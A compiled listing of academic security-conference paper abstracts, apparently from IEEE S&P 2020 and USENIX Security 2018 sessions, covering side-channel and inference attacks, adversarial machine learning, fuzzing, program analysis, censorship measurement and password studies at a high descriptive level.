Recent foundational work on leakage-abuse attacks on encrypted databases has broadened our understanding of what an adversary can accomplish with a standard leakage profile. Nevertheless, all known value reconstruction attacks succeed under strong assumptions that may not hold in the real world. The most prevalent assumption is that queries are issued uniformly at random by the client. We present the first value reconstruction attacks that succeed without any knowledge about the query or data distribution. Our approach uses the search-pattern leakage, which exists in all known structured encryption schemes but has not been fully exploited so far. At the core of our method lies a support size estimator, a technique that utilizes the repetition of search tokens with the same response to estimate distances between encrypted values without any assumptions about the underlying distribution. We develop distribution-agnostic reconstruction attacks for both range queries and k-nearest-neighbor (k-NN) queries based on information extracted from the search-pattern leakage. Our new range attack follows a different algorithmic approach than state-of-the-art attacks, which are fine-tuned to succeed under the uniformly distributed queries. Instead, we reconstruct plaintext values under a variety of skewed query distributions and even outperform the accuracy of previous approaches under the uniform query distribution. Our new k-NN attack succeeds with far fewer samples than previous attacks and scales to much larger values of k. We demonstrate the effectiveness of our attacks by experimentally testing them on a wide range of query distributions and database densities, both unknown to the adversary.

Pseudorandom Black Swans: Cache Attacks on CTR_DRBG

Modern cryptography requires the ability to securely generate pseudorandom numbers. However, despite decades of work on side-channel attacks, there is little discussion of their application to pseudorandom number generators (PRGs). In this work we set out to address this gap, empirically evaluating the side-channel resistance of common PRG implementations.We find that hard-learned lessons about side-channel leakage from encryption primitives have not been applied to PRGs, at all abstraction levels. At the design level, the NIST-recommended CTR_DRBG does not have forward security if an attacker is able to compromise the state (e.g., via a side-channel). At the primitive level, popular implementations of CTR_DRBG such as OpenSSL’s FIPS module and NetBSD’s kernel use leaky T-table AES as their underlying cipher, enabling cache side-channel attacks. Finally, we find that many implementations make parameter choices that enable an attacker to fully exploit side-channels and recover secret keys from TLS connections.We empirically demonstrate our attack in two scenarios. First, we carry out a cache attack that recovers the private state from vulnerable CTR_DRBG implementations when the TLS client connects to an attacker-controlled server. We then subsequently use the recovered state to compute the client’s long-term authentication keys, thereby allowing the attacker to impersonate the client. In the second scenario, we show that an attacker can exploit the high temporal resolution provided by Intel SGX to carry out a blind attack to recover CTR_DRBG’s state within three AES encryptions, without viewing output, and thus decrypt passively collected TLS connections from the victim.

Flaw Label: Exploiting IPv6 Flow Label

The IPv6 protocol was designed with security in mind. One of the changes that IPv6 has introduced over IPv4 is a new 20-bit flow label field in its protocol header.We show that remote servers can use the flow label field in order to assign a unique ID to each device when communicating with machines running Windows 10 (versions 1703 and higher), and Linux and Android (kernel versions 4.3 and higher). The servers are then able to associate the respective device IDs with subsequent transmissions sent from those machines. This identification is done by exploiting the flow label field generation logic and works across all browsers regardless of network changes. Furthermore, a variant of this attack also works passively, namely without actively triggering traffic from those machines.To design the attack we reverse-engineered and cryptanalyzed the Windows flow label generation code and inspected the Linux kernel flow label generation code. We provide a practical technique to partially extract the key used by each of these algorithms, and observe that this key can identify individual devices across networks, VPNs, browsers and privacy settings. We deployed a demo (for both Windows and Linux/Android) showing that key extraction and machine fingerprinting works in the wild, and tested it from networks around the world.

Session #7: Adversarial Machine Learning

HopSkipJumpAttack: A Query-Efficient Decision-Based Attack

The goal of a decision-based adversarial attack on a trained model is to generate adversarial examples based solely on observing output labels returned by the targeted model. We develop HopSkipJumpAttack, a family of algorithms based on a novel estimate of the gradient direction using binary information at the decision boundary. The proposed family includes both untargeted and targeted attacks optimized for ℓ and ℓ ∞ similarity metrics respectively. Theoretical analysis is provided for the proposed algorithms and the gradient direction estimate. Experiments show HopSkipJumpAttack requires significantly fewer model queries than several state-of-the-art decision-based adversarial attacks. It also achieves competitive performance in attacking several widely-used defense mechanisms.

Humpty Dumpty: Controlling Word Meanings via Corpus Poisoning

Word embeddings, i.e., low-dimensional vector representations such as GloVe and SGNS, encode word “meaning” in the sense that distances between words’ vectors correspond to their semantic proximity. This enables transfer learning of semantics for a variety of natural language processing tasks.Word embeddings are typically trained on large public corpora such as Wikipedia or Twitter. We demonstrate that an attacker who can modify the corpus on which the embedding is trained can control the “meaning” of new and existing words by changing their locations in the embedding space. We develop an explicit expression over corpus features that serves as a proxy for distance between words and establish a causative relationship between its values and embedding distances. We then show how to use this relationship for two adversarial objectives: (1) make a word a top-ranked neighbor of another word, and (2) move a word from one semantic cluster to another.An attack on the embedding can affect diverse downstream tasks, demonstrating for the first time the power of data poisoning in transfer learning scenarios. We use this attack to manipulate query expansion in information retrieval systems such as resume search, make certain names more or less visible to named entity recognition models, and cause new words to be translated to a particular target word regardless of the language. Finally, we show how the attacker can generate linguistically likely corpus modifications, thus fooling defenses that attempt to filter implausible sentences from the corpus using a language model.

Privacy Risks of General-Purpose Language Models

Recently, a new paradigm of building general-purpose language models (e.g., Google’s Bert and OpenAI’s GPT-2) in Natural Language Processing (NLP) for text feature extraction, a standard procedure in NLP systems that converts texts to vectors (i.e., embeddings) for downstream modeling, has arisen and starts to find its application in various downstream NLP tasks and real world systems (e.g., Google’s search engine [6]). To obtain general-purpose text embeddings, these language models have highly complicated architectures with millions of learnable parameters and are usually pretrained on billions of sentences before being utilized. As is widely recognized, such a practice indeed improves the state-of-the-art performance of many downstream NLP tasks. However, the improved utility is not for free. We find the text embeddings from general-purpose language models would capture much sensitive information from the plain text. Once being accessed by the adversary, the embeddings can be reverse-engineered to disclose sensitive information of the victims for further harassment. Although such a privacy risk can impose a real threat to the future leverage of these promising NLP tools, there are neither published attacks nor systematic evaluations by far for the mainstream industry-level language models. To bridge this gap, we present the first systematic study on the privacy risks of 8 state-of-the-art language models with 4 diverse case studies. By constructing 2 novel attack classes, our study demonstrates the aforementioned privacy risks do exist and can impose practical threats to the application of general-purpose language models on sensitive data covering identity, genome, healthcare and location. For example, we show the adversary with nearly no prior knowledge can achieve about 75% accuracy when inferring the precise disease site from Bert embeddings of patients’ medical descriptions. As possible countermeasures, we propose 4 different defenses (via rounding, different…

Intriguing Properties of Adversarial ML Attacks in the Problem Space

Recent research efforts on adversarial ML have investigated problem-space attacks, focusing on the generation of real evasive objects in domains where, unlike images, there is no clear inverse mapping to the feature space (e.g., software). However, the design, comparison, and real-world implications of problem-space attacks remain underexplored.This paper makes two major contributions. First, we propose a novel formalization for adversarial ML evasion attacks in the problem-space, which includes the definition of a comprehensive set of constraints on available transformations, preserved semantics, robustness to preprocessing, and plausibility. We shed light on the relationship between feature space and problem space, and we introduce the concept of side-effect features as the byproduct of the inverse feature-mapping problem. This enables us to define and prove necessary and sufficient conditions for the existence of problem-space attacks. We further demonstrate the expressive power of our formalization by using it to describe several attacks from related literature across different domains.Second, building on our formalization, we propose a novel problem-space attack on Android malware that overcomes past limitations. Experiments on a dataset with 170K Android apps from 2017 and 2018 show the practical feasibility of evading a state-of-the-art malware classifier along with its hardened version. Our results demonstrate that “adversarial-malware as a service” is a realistic threat, as we automatically generate thousands of realistic and inconspicuous adversarial applications at scale, where on average it takes only a few minutes to generate an adversarial app. Yet, out of the 1600+ papers on adversarial ML published in the past six years, roughly 40 focus on malware [15]—and many remain only in the feature space.Our formalization of problem-space attacks paves the way to more principled research in this domain. We responsibly release the code and dataset of our novel attack to other researchers, to encourage future work on defenses in the problem space.

Session #7: New Directions and Settings

Influencing Photo Sharing Decisions on Social Media: A Case of Paradoxical Findings

We investigate the effects of perspective taking, privacy cues, and portrayal of photo subjects (i.e., photo valence) on decisions to share photos of people via social media. In an online experiment we queried 379 participants about 98 photos (that were previously rated for photo valence) in three conditions: (1) Baseline: participants judged their likelihood of sharing each photo; (2) Perspective-taking: participants judged their likelihood of sharing each photo when cued to imagine they are the person in the photo; and (3) Privacy: participants judged their likelihood to share after being cued to consider the privacy of the person in the photo. While participants across conditions indicated a lower likelihood of sharing photos that portrayed people negatively, they – surprisingly – reported a higher likelihood of sharing photos when primed to consider the privacy of the person in the photo. Frequent photo sharers on real-world social media platforms and people without strong personal privacy preferences were especially likely to want to share photos in the experiment, regardless of how the photo portrayed the subject. A follow-up study with 100 participants explaining their responses revealed that the Privacy condition led to a lack of concern with others’ privacy. These findings suggest that developing interventions for reducing photo sharing and protecting the privacy of others is a multivariate problem in which seemingly obvious solutions can sometimes go awry.

SoK: Cyber Insurance - Technical Challenges and a System Security Roadmap

Cyber attacks have increased in number and complexity in recent years, and companies and organizations have accordingly raised their investments in more robust infrastructure to preserve their data, assets and reputation. However, the full protection against these countless and constantly evolving threats is unattainable by the sole use of preventive measures. Therefore, to handle residual risks and contain business losses in case of an incident, firms are increasingly adopting a cyber insurance as part of their corporate risk management strategy.As a result, the cyber insurance sector – which offers to transfer the financial risks related to network and computer incidents to a third party – is rapidly growing, with recent claims that already reached a $100M dollars. However, while other insurance sectors rely on consolidated methodologies to accurately predict risks, the many peculiarities of the cyber domain resulted in carriers to often resort to qualitative approaches based on experts opinions.This paper looks at past research conducted in the area of cyber insurance and classifies previous studies in four different areas, focused respectively on studying the economical aspects, the mathematical models, the risk management methodologies, and the predictions of cyber events. We then identify, for each insurance phase, a group of practical research problems where security experts can help develop new data-driven methodologies and automated tools to replace the existing qualitative approaches.

A Tale of Sea and Sky: On the Security of Maritime VSAT Communications

Very Small Aperture Terminals (VSAT) have revolutionized maritime operations. However, the security dimensions of maritime VSAT services are not well understood. Historically, high equipment costs have acted as a barrier to entry for both researchers and attackers. In this paper we demonstrate a substantial change in threat model, proving practical attacks against maritime VSAT networks with less than $400 of widely-available television equipment. This is achieved through GSExtract, a purpose-built forensic tool which enables the extraction of IP traffic from highly corrupted VSAT data streams.The implications of this threat are assessed experimentally through the analysis of more than 1.3 TB of real-world maritime VSAT recordings encompassing 26 million square kilometers of coverage area. The underlying network platform employed in these systems is representative of more than 60% of the global maritime VSAT services market. We find that sensitive data belonging to some of the world’s largest maritime companies is regularly leaked over VSAT ship-to-shore communications. This threat is contextualized through illustrative case studies ranging from the interception and alteration of navigational charts to theft of passport and credit card details. Beyond this, we demonstrate the ability to arbitrarily intercept and modify TCP sessions under certain network configurations, enabling man-in-the-middle and denial of service attacks against ships at sea. The paper concludes with a brief discussion of the unique requirements and challenges for encryption in VSAT environments.

I Know Where You Parked Last Summer _ Automated Reverse Engineering and Privacy Analysis of Modern Cars

Nowadays, cars are equipped with hundreds of sensors and dozens of computers that process data. Unfortunately, due to the very secret nature of the automotive industry, there is no official nor objective source of information as to what data exactly their vehicles collect. Anecdotal evidence suggests that OEMs are collecting huge amounts of personal data about their drivers, which they suddenly reveal when requested in court.In this paper, we present our tool AutoCAN for privacy and security analysis of cars that reveals what data cars collect by tapping into in-vehicle networks and extracting time series of data and automatically making sense of them by establishing relationships based on laws of physics. These algorithms work irrespective of make, model or used protocols. Our results show that car makers track the GPS position, the number of occupants, their weight, usage statistics of doors, lights, and AC. We also reveal that OEMs embed functions to remotely disable the car or get an alert when the driver is speeding.

Session #8: Program Analysis

RetroWrite: Statically Instrumenting COTS Binaries for Fuzzing and Sanitization

Analyzing the security of closed source binaries is currently impractical for end-users, or even developers who rely on third-party libraries. Such analysis relies on automatic vulnerability discovery techniques, most notably fuzzing with sanitizers enabled. The current state of the art for applying fuzzing or sanitization to binaries is dynamic binary translation, which has prohibitive performance overhead. The alternate technique, static binary rewriting, cannot fully recover symbolization information and hence has difficulty modifying binaries to track code coverage for fuzzing or to add security checks for sanitizers.The ideal solution for binary security analysis would be a static rewriter that can intelligently add the required instrumentation as if it were inserted at compile time. Such instrumentation requires an analysis to statically disambiguate between references and scalars, a problem known to be undecidable in the general case. We show that recovering this information is possible in practice for the most common class of software and libraries: 64-bit, position independent code. Based on this observation, we develop RetroWrite, a binary-rewriting instrumentation to support American Fuzzy Lop (AFL) and Address Sanitizer (ASan), and show that it can achieve compiler-level performance while retaining precision. Binaries rewritten for coverage-guided fuzzing using RetroWrite are identical in performance to compiler-instrumented binaries and outperform the default QEMU-based instrumentation by 4.5x while triggering more bugs. Our implementation of binary-only Address Sanitizer is 3x faster than Valgrind’s memcheck, the state-of-the-art binary-only memory checker, and detects 80% more bugs in our evaluation.

Unexpected Data Dependency Creation and Chaining: A New Attack to SDN

Software-Defined Networking (SDN) is an emerging network architecture that provides programmable networking through a logically centralized controller. As SDN becomes more prominent, its security vulnerabilities become more evident than ever. Serving as the “brain” of a software-defined network, how the control plane (of the network) is exposed to external inputs (i.e., data plane messages) is directly correlated with how secure the network is. Fortunately, due to some unique SDN design choices (e.g., control plane and data plane separation), attackers often struggle to find a reachable path to those vulnerable logic hidden deeply within the control plane.In this paper, we demonstrate that it is possible for a weak adversary who only controls a commodity network device (host or switch) to attack previously unreachable control plane components by maliciously increasing reachability in the control plane. We introduce D 2 C 2 (data dependency creation and chaining) attack, which leverages some widely-used SDN protocol features (e.g., custom fields) to create and chain unexpected data dependencies in order to achieve greater reachability. We have developed a novel tool, SVHunter, which can effectively identify D 2 C 2 vulnerabilities. Till now we have evaluated SVHunter on three mainstream open-source SDN controllers (i.e., ONOS, Floodlight, and Opendaylight) as well as one security-enhanced controller (i.e., SE-Floodlight). SVHunter detects 18 previously unknown vulnerabilities, all of which can be exploited remotely to launch serious attacks such as executing arbitrary commands, exfiltrating confidential files, and crashing SDN services.

Neutaint: Efficient Dynamic Taint Analysis with Neural Networks

Dynamic taint analysis (DTA) is widely used by various applications to track information flow during runtime execution. Existing DTA techniques use rule-based taint-propagation, which is neither accurate (i.e., high false positive rate) nor efficient (i.e., large runtime overhead). It is hard to specify taint rules for each operation while covering all corner cases correctly. Moreover, the overtaint and undertaint errors can accumulate during the propagation of taint information across multiple operations. Finally, rule-based propagation requires each operation to be inspected before applying the appropriate rules resulting in prohibitive performance overhead on large real-world applications.In this work, we propose Neutaint, a novel end-to-end approach to track information flow using neural program embeddings. The neural program embeddings model the target’s programs computations taking place between taint sources and sinks, which automatically learns the information flow by observing a diverse set of execution traces. To perform lightweight and precise information flow analysis, we utilize saliency maps to reason about most influential sources for different sinks. Neutaint constructs two saliency maps, a popular machine learning approach to influence analysis, to summarize both coarse-grained and fine-grained information flow in the neural program embeddings.We compare Neutaint with 3 state-of-the-art dynamic taint analysis tools. The evaluation results show that Neutaint can achieve 68% accuracy, on average, which is 10% improvement while reducing 40× runtime overhead over the second-best taint tool Libdft on 6 real world programs. Neutaint also achieves 61% more edge coverage when used for taint-guided fuzzing indicating the effectiveness of the identified influential bytes. We also evaluate Neutaint’s ability to detect real world software attacks. The results show that Neutaint can successfully detect different types of vulnerabilities including buffer/heap/integer overflows, division by zero, etc. Lastly, Neutaint can detect 98.7% of total flows, the highest among all taint analysis tools.

KARONTE: Detecting Insecure Multi-binary Interactions in Embedded Firmware

Low-power, single-purpose embedded devices (e.g., routers and IoT devices) have become ubiquitous. While they automate and simplify many aspects of users’ lives, recent large-scale attacks have shown that their sheer number poses a severe threat to the Internet infrastructure. Unfortunately, the software on these systems is hardware-dependent, and typically executes in unique, minimal environments with non-standard configurations, making security analysis particularly challenging. Many of the existing devices implement their functionality through the use of multiple binaries. This multi-binary service implementation renders current static and dynamic analysis techniques either ineffective or inefficient, as they are unable to identify and adequately model the communication between the various executables. In this paper, we present Karonte, a static analysis approach capable of analyzing embedded-device firmware by modeling and tracking multi-binary interactions. Our approach propagates taint information between binaries to detect insecure interactions and identify vulnerabilities. We first evaluated Karonte on 53 firmware samples from various vendors, showing that our prototype tool can successfully track and constrain multi-binary interactions. This led to the discovery of 46 zero-day bugs. Then, we performed a large-scale experiment on 899 different samples, showing that Karonte scales well with firmware samples of different size and complexity.

Despite the effort of software maintainers, patches to open-source repositories are propagated from the main codebase to all the related projects (e.g., forks) with a significant delay. Previous work shows that this is true also for security patches, which represents a critical problem. Vulnerability databases, such as the CVE database, were born to speed-up the application of critical patches; however, patches associated with CVE entries (i.e., CVE patches) are still applied with a delay, and some security fixes lack the corresponding CVE entries. Because of this, project maintainers could miss security patches when upgrading software.In this paper, we are the first to define safe patches (sps). An sp is a patch that does not disrupt the intended functionality of the program (on valid inputs), meaning that it can be applied with no testing; we argue that most security fixes fall into this category. Furthermore, we show a technique to identify sps, and implement SPIDER 1 , a tool based on such a technique that works by analyzing the source code of the original and patched versions of a file. We performed a large-scale evaluation on 341,767 patches from 32 large and popular source code repositories as well as on 809 CVE patches. Results show that SPIDER was able to identify 67,408 sps and that most of the CVE patches are sps. In addition, SPIDER identified 2,278 patches that fix vulnerabilities lacking a CVE; 229 of these are still unpatched in different vendor kernels, which can be considered as potential unfixed vulnerabilities.

Session #8: Fuzzing

SAVIOR: Towards Bug-Driven Hybrid Testing

Hybrid testing combines fuzz testing and concolic execution. It leverages fuzz testing to test easy-to-reach code regions and uses concolic execution to explore code blocks guarded by complex branch conditions. As a result, hybrid testing is able to reach deeper into program state space than fuzz testing or concolic execution alone. Recently, hybrid testing has seen significant advancement. However, its code coverage-centric design is inefficient in vulnerability detection. First, it blindly selects seeds for concolic execution and aims to explore new code continuously. However, as statistics show, a large portion of the explored code is often bug-free. Therefore, giving equal attention to every part of the code during hybrid testing is a non-optimal strategy. It slows down the detection of real vulnerabilities by over 43%. Second, classic hybrid testing quickly moves on after reaching a chunk of code, rather than examining the hidden defects inside. It may frequently miss subtle vulnerabilities despite that it has already explored the vulnerable code paths.We propose SAVIOR, a new hybrid testing framework pioneering a bug-driven principle. Unlike the existing hybrid testing tools, SAVIOR prioritizes the concolic execution of the seeds that are likely to uncover more vulnerabilities. Moreover, SAVIOR verifies all vulnerable program locations along the executing program path. By modeling faulty situations using SMT constraints, SAVIOR reasons the feasibility of vulnerabilities and generates concrete test cases as proofs. Our evaluation shows that the bug-driven approach outperforms mainstream automated testing techniques, including state-of-the-art hybrid testing systems driven by code coverage. On average, SAVIOR detects vulnerabilities 43.4% faster than DRILLER and 44.3% faster than QSYM, leading to the discovery of 88 and 76 more unique bugs, respectively. According to the evaluation on 11 well fuzzed benchmark programs, within the first 24 hours, SAVIOR triggers 481 UBSAN violations, among which 243 are real bugs.

IJON: Exploring Deep State Spaces via Fuzzing

Although current fuzz testing (fuzzing) methods are highly effective, there are still many situations such as complex state machines where fully automated approaches fail. State-of-the-art fuzzing methods offer very limited ability for a human to interact and aid the fuzzer in such cases. More specifically, most current approaches are limited to adding a dictionary or new seed inputs to guide the fuzzer. When dealing with complex programs, these mechanisms are unable to uncover new parts of the code base.In this paper, we propose Ijon, an annotation mechanism that a human analyst can use to guide the fuzzer. In contrast to the two aforementioned techniques, this approach allows a more systematic exploration of the program’s behavior based on the data representing the internal state of the program. As a consequence, using only a small (usually one line) annotation, a user can help the fuzzer to solve previously unsolvable challenges. We extended various AFL-based fuzzers with the ability to annotate the source code of the target application with guidance hints. Our evaluation demonstrates that such simple annotations are able to solve problems that—to the best of our knowledge— no other current fuzzer or symbolic execution based tool can overcome. For example, with our extension, a fuzzer is able to play and solve games such as Super Mario Bros. or resolve more complex patterns such as hash map lookups. To further demonstrate the capabilities of our annotations, we use AFL combined with Ijon to uncover both novel security issues and issues that previously required a custom and comprehensive grammar to be uncovered. Lastly, we show that using Ijon and AFL, one can solve many challenges from the CGC data set that resisted all fully automated and human guided attempts so far.

Pangolin:Incremental Hybrid Fuzzing with Polyhedral Path Abstraction

Hybrid fuzzing, which combines the merits of both fuzzing and concolic execution, has become one of the most important trends in coverage-guided fuzzing techniques. Despite the tremendous research on hybrid fuzzers, we observe that existing techniques are still inefficient. One important reason is that these techniques, which we refer to as non-incremental fuzzers, cache and reuse few computation results and, thus, lose many optimization opportunities. To be incremental, we propose “polyhedral path abstraction”, which preserves the exploration state in the concolic execution stage and allows more effective mutation and constraint solving over existing techniques. We have implemented our idea as a tool, namely Pangolin, and evaluated it using LAVA-M as well as nine real-world programs. The evaluation results showed that Pangolin outperforms the state-of-the-art fuzzing techniques with the improvement of coverage rate ranging from 10% to 30%. Moreover, Pangolin found 400 more bugs in LAVA-M and discovered 41 unseen bugs with 8 of them assigned with the CVE IDs.

Fuzzing JavaScript Engines with Aspect-preserving Mutation

Fuzzing is a practical, widely-deployed technique to find bugs in complex, real-world programs like JavaScript engines. We observed, however, that existing fuzzing approaches, either generative or mutational, fall short in fully harvesting high-quality input corpora such as known proof of concept (PoC) exploits or unit tests. Existing fuzzers tend to destruct subtle semantics or conditions encoded in the input corpus in order to generate new test cases because this approach helps in discovering new code paths of the program. Nevertheless, for JavaScript-like complex programs, such a conventional design leads to test cases that tackle only shallow parts of the complex codebase and fails to reach deep bugs effectively due to the huge input space.In this paper, we advocate a new technique, called an aspect-preserving mutation, that stochastically preserves the desirable properties, called aspects, that we prefer to be maintained across mutation. We demonstrate the aspect preservation with two mutation strategies, namely, structure and type preservation, in our fully-fledged JavaScript fuzzer, called Die. Our evaluation shows that Die’s aspect-preserving mutation is more effective in discovering new bugs (5.7× more unique crashes) and producing valid test cases (2.4× fewer runtime errors) than the state-of-the-art JavaScript fuzzers. Die newly discovered 48 high-impact bugs in ChakraCore, JavaScriptCore, and V8 (38 fixed with 12 CVEs assigned as of today). The source code of Die is publicly available as an open-source project. 1

Krace: Data Race Fuzzing for Kernel File Systems

Data races occur when two threads fail to use proper synchronization when accessing shared data. In kernel file systems, which are highly concurrent by design, data races are common mistakes and often wreak havoc on the users, causing inconsistent states or data losses. Prior fuzzing practices on file systems have been effective in uncovering hundreds of bugs, but they mostly focus on the sequential aspect of file system execution and do not comprehensively explore the concurrency dimension and hence, forgo the opportunity to catch data races.In this paper, we bring coverage-guided fuzzing to the concurrency dimension with three new constructs: 1) a new coverage tracking metric, alias coverage, specially designed to capture the exploration progress in the concurrency dimension; 2) an evolution algorithm for generating, mutating, and merging multi-threaded syscall sequences as inputs for concurrency fuzzing; and 3) a comprehensive lockset and happens-before modeling for kernel synchronization primitives for precise data race detection. These components are integrated into Krace, an end-to-end fuzzing framework that has discovered 23 data races in ext4, btrfs, and the VFS layer so far, and 9 are confirmed to be harmful.

USENIX Security

2018 Technical Sessions dblp

Censorship and Web Privacy

Fp-Scanner: The Privacy Implications of Browser Fingerprint Inconsistencies

By exploiting the diversity of device and browser configurations, browser fingerprinting established itself as a viable technique to enable stateless user tracking in production. Companies and academic communities have responded with a wide range of countermeasures. However, the way these countermeasures are evaluated does not properly assess their impact on user privacy, in particular regarding the quantity of information they may indirectly leak by revealing their presence.

In this paper, we investigate the current state of the art of browser fingerprinting countermeasures to study the inconsistencies they may introduce in altered finger- prints, and how this may impact user privacy. To do so, we introduce FP-Scanner as a new test suite that explores browser fingerprint inconsistencies to detect potential alterations, and we show that we are capable of detecting countermeasures from the inconsistencies they introduce. Beyond spotting altered browser fingerprints, we demonstrate that FP-Scanner can also reveal the original value of altered fingerprint attributes, such as the browser or the operating system. We believe that this result can be exploited by fingerprinters to more accurately target browsers with countermeasures.

Nowadays, cookies are the most prominent mechanism to identify and authenticate users on the Internet. Although protected by the Same Origin Policy, popular browsers include cookies in all requests, even when these are cross-site. Unfortunately, these third-party cookies enable both cross-site attacks and third-party tracking. As a response to these nefarious consequences, various countermeasures have been developed in the form of browser extensions or even protection mechanisms that are built directly into the browser.

In this paper, we evaluate the effectiveness of these defense mechanisms by leveraging a framework that automatically evaluates the enforcement of the policies imposed to third-party requests. By applying our framework, which generates a comprehensive set of test cases covering various web mechanisms, we identify several flaws in the policy implementations of the 7 browsers and 46 browser extensions that were evaluated. We find that even built-in protection mechanisms can be circumvented by multiple novel techniques we discover. Based on these results, we argue that our proposed framework is a much-needed tool to detect bypasses and evaluate solutions to the exposed leaks. Finally, we analyze the origin of the identified bypass techniques, and find that these are due to a variety of implementation, configuration and design flaws.

Effective Detection of Multimedia Protocol Tunneling using Machine Learning

Multimedia protocol tunneling enables the creation of covert channels by modulating data into the input of popular multimedia applications such as Skype. To be effective, protocol tunneling must be unobservable, i.e., an adversary should not be able to distinguish the streams that carry a covert channel from those that do not. However, existing multimedia protocol tunneling systems have been evaluated using ad hoc methods, which casts doubts on whether such systems are indeed secure, for instance, for censorship-resistant communication.

In this paper, we conduct an experimental study of the unobservability properties of three state of the art systems: Facet, CovertCast, and DeltaShaper. Our work unveils that previous claims regarding the unobservability of the covert channels produced by those tools were flawed and that existing machine learning techniques, namely those based on decision trees, can uncover the vast majority of those channels while incurring in comparatively lower false positive rates. We also explore the application of semi-supervised and unsupervised machine learning techniques. Our findings suggest that the existence of manually labeled samples is a requirement for the successful detection of covert channels.

Quack: Scalable Remote Measurement of Application-Layer Censorship

Remote censorship measurement tools can now detect DNS- and IP-based blocking at global scale. However, a major unmonitored form of interference is blocking triggered by deep packet inspection of application-layer data. We close this gap by introducing Quack, a scalable, remote measurement system that can efficiently detect application-layer interference.

We show that Quack can effectively detect application- layer blocking triggered on HTTP and TLS headers, and it is flexible enough to support many other diverse protocols. In experiments, we test for blocking across 4458 autonomous systems, an order of magnitude larger than provided by country probes used by OONI. We also test a corpus of 100,000 keywords from vantage points in 40 countries to produce detailed national blocklists. Finally, we analyze the keywords we find blocked to provide in- sight into the application-layer blocking ecosystem and compare countries’ behavior. We find that the most consistently blocked services are related to circumvention tools, pornography, and gambling, but that there is significant country-to-country variation.

Understanding How Humans Authenticate

Better managed than memorized? Studying the Impact of Managers on Password Strength and Reuse

Despite their well-known security problems, passwords are still the incumbent authentication method for virtually all online services. To remedy the situation, users are very often referred to password managers as a solution to the password reuse and weakness problems. However, to date the actual impact of password managers on password strength and reuse has not been studied systematically.

We provide the first large-scale study of the password managers’ influence on users’ real-life passwords. By combining qualitative data on users’ password creation and management strategies, collected from 476 participants of an online survey, with quantitative data (incl. password metrics and entry methods) collected in situ with a browser plugin from 170 users, we were able to gain a more complete picture of the factors that influence our participants’ password strength and reuse. Our approach allows us to quantify for the first time that password managers indeed influence the password security, however, whether this influence is beneficial or aggravating existing problems depends on the users’ strategies and how well the manager supports the users’ password management right from the time of password creation. Given our results, we think research should further investigate how managers can better support users’ password strategies in order to improve password security as well as stop aggravating the existing problems.

Forgetting of Passwords: Ecological Theory and Data

It is well known that text-based passwords are hard to remember and that users prefer simple (and non-secure) passwords. However, despite extensive research on the topic, no principled account exists for explaining when a password will be forgotten. This paper contributes new data and a set of analyses building on the ecological theory of memory and forgetting. We propose that human memory naturally adapts according to an estimate of how often a password will be needed, such that often used, important passwords are less likely to be forgotten. We derive models for login duration and odds of recall as a function of rate of use and number of uses thus far. The models achieved a root-mean-square error (RMSE) of 1.8 seconds for login duration and 0.09 for recall odds for data collected in a month-long field experiment where frequency of password use was controlled. The theory and data shed new light on password management, account usage, password security and memorability.

The Rewards and Costs of Stronger Passwords in a University: Linking Password Lifetime to Strength

We present an opportunistic study of the impact of a new password policy in a university with 100,000 staff and students. The goal of the IT staff who conceived the policy was to encourage stronger passwords by varying password lifetime according to password strength. Strength was measured through Shannon entropy (acknowledged to be a poor measure of password strength by the academic community, but still widely used in practice). When users change their password, a password meter informs them of the lifetime of their new password, which may vary from 100 days (50 bits of entropy) to 350 days (120 bits of entropy).

We analysed data of nearly 200,000 password changes and 115,000 resets of passwords that were forgotten/expired over a period of 14 months. The new policy took over 100 days to gain traction, but after that, average entropy rose steadily. After another 12 months, the average password lifetime increased from 146 days (63 bits) to 170 days (70 bits).

We also found that passwords with more than 300 days of lifetime are 4 times as likely to be reset as passwords of 100 days of lifetime. Users who reset their password more than once per year (27% of users) choose passwords with over 10 days fewer lifetime, and while they also respond to the policy, maintain this deficit.

We conclude that linking password lifetime to strength at the point of password creation is a viable strategy for encouraging users to choose stronger passwords (at least when measured by Shannon entropy).

Rethinking Access Control and Authentication for the Home Internet of Things (IoT)

Computing is transitioning from single-user devices to the Internet of Things (IoT), in which multiple users with complex social relationships interact with a single device. Currently deployed techniques fail to provide usable access-control specification or authentication in such settings. In this paper, we begin reenvisioning access control and authentication for the home IoT. We propose that access control focus on IoT capabilities (i.e., certain actions that devices can perform), rather than on a per-device granularity. In a 425-participant online user study, we find stark differences in participants’ desired access-control policies for different capabilities within a single device, as well as based on who is trying to use that capability. From these desired policies, we identify likely candidates for default policies. We also pinpoint necessary primitives for specifying more complex, yet desired, access-control policies. These primitives range from the time of day to the current location of users. Finally, we discuss the degree to which different authentication methods potentially support desired policies.

Vulnerability Discovery

ATtention Spanned: Comprehensive Vulnerability Analysis of AT Commands Within the Android Ecosystem

AT commands, originally designed in the early 80s for controlling modems, are still in use in most modern smartphones to support telephony functions. The role of AT commands in these devices has vastly expanded through vendor-specific customizations, yet the extent of their functionality is unclear and poorly documented. In this paper, we systematically retrieve and extract 3,500 AT commands from over 2,000 Android smartphone firmware images across 11 vendors. We methodically test our corpus of AT commands against eight Android devices from four different vendors through their USB interface and characterize the powerful functionality exposed, including the ability to rewrite device firmware, bypass Android security mechanisms, exfiltrate sensitive device information, perform screen unlocks, and inject touch events solely through the use of AT commands. We demonstrate that the AT command interface contains an alarming amount of unconstrained functionality and represents a broad attack surface on Android devices.

Charm: Facilitating Dynamic Analysis of Device Drivers of Mobile Systems

Mobile systems, such as smartphones and tablets, incorporate a diverse set of I/O devices, such as camera, audio devices, GPU, and sensors. This in turn results in a large number of diverse and customized device drivers running in the operating system kernel of mobile systems. These device drivers contain various bugs and vulnerabilities, making them a top target for kernel exploits [78]. Unfortunately, security analysts face important challenges in analyzing these device drivers in order to find, understand, and patch vulnerabilities. More specifically, using the state-of-the-art dynamic analysis techniques such as interactive debugging, fuzzing, and record-and-replay for analysis of these drivers is difficult, inefficient, or even completely inaccessible depending on the analysis.

